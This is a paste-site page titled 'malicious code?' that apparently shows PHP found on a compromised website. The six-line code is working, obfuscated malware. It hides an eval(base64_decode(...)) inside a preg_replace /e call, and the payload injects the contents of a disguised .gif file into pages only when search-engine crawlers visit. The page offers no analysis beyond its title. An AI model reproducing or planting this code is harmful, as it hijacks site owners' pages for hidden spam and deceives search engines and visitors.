SHARE
TWEET

malicious code?

a guest Apr 6th, 2011 240 Never
  1. <?php
  2. function gzde_mod($s) {return gzinflate(substr($s, 10));}
  3. function callback_func($buffer){if(substr($buffer,0,8)=="\x1f\x8b\x08\x00\x00\x00\x00\x00"){$gz=1;$buffer=gzde_mod($buffer);}
  4. chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
  5. @preg_replace("/.+/"."e"."si","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'JGZmZmlsZT0nL2hvbWUvd3d3L2ZyaW5nZS5vcmcvUGljcy9tb2R1bGVzL3JlYXJyYW5nZS9sb2NhbGUvcnUvYmxhbmstMTIweDcwLmdpZic7aWYgKCFlbXB0eSgkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pIGFuZCBAcHJlZ19tYXRjaCgiI2dvb2dsZWJvdHxzbHVycHxtc25ib3Qjc2kiLCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkgYW5kIEBmaWxlX2V4aXN0cygkZmZmaWxlKSkgJGJ1ZmZlcj1Ac3RyX3JlcGxhY2UoYXJyYXkoIjwvYm9keT4iLCI8L0JPRFk+IiksYXJyYXkoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIuQGZpbGVfZ2V0X2NvbnRlbnRzKCRmZmZpbGUpLiJcbjwvYm9keT4iLCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiLkBmaWxlX2dldF9jb250ZW50cygkZmZmaWxlKS4iXG48L0JPRFk+IiksJGJ1ZmZlcik7'\x29\x29\x3B",'1');
  6. if(isset($gz))$buffer=gzencode($buffer);return $buffer;}if (function_exists("ob_start"))@ob_end_flush();?>
RAW Paste Data
Top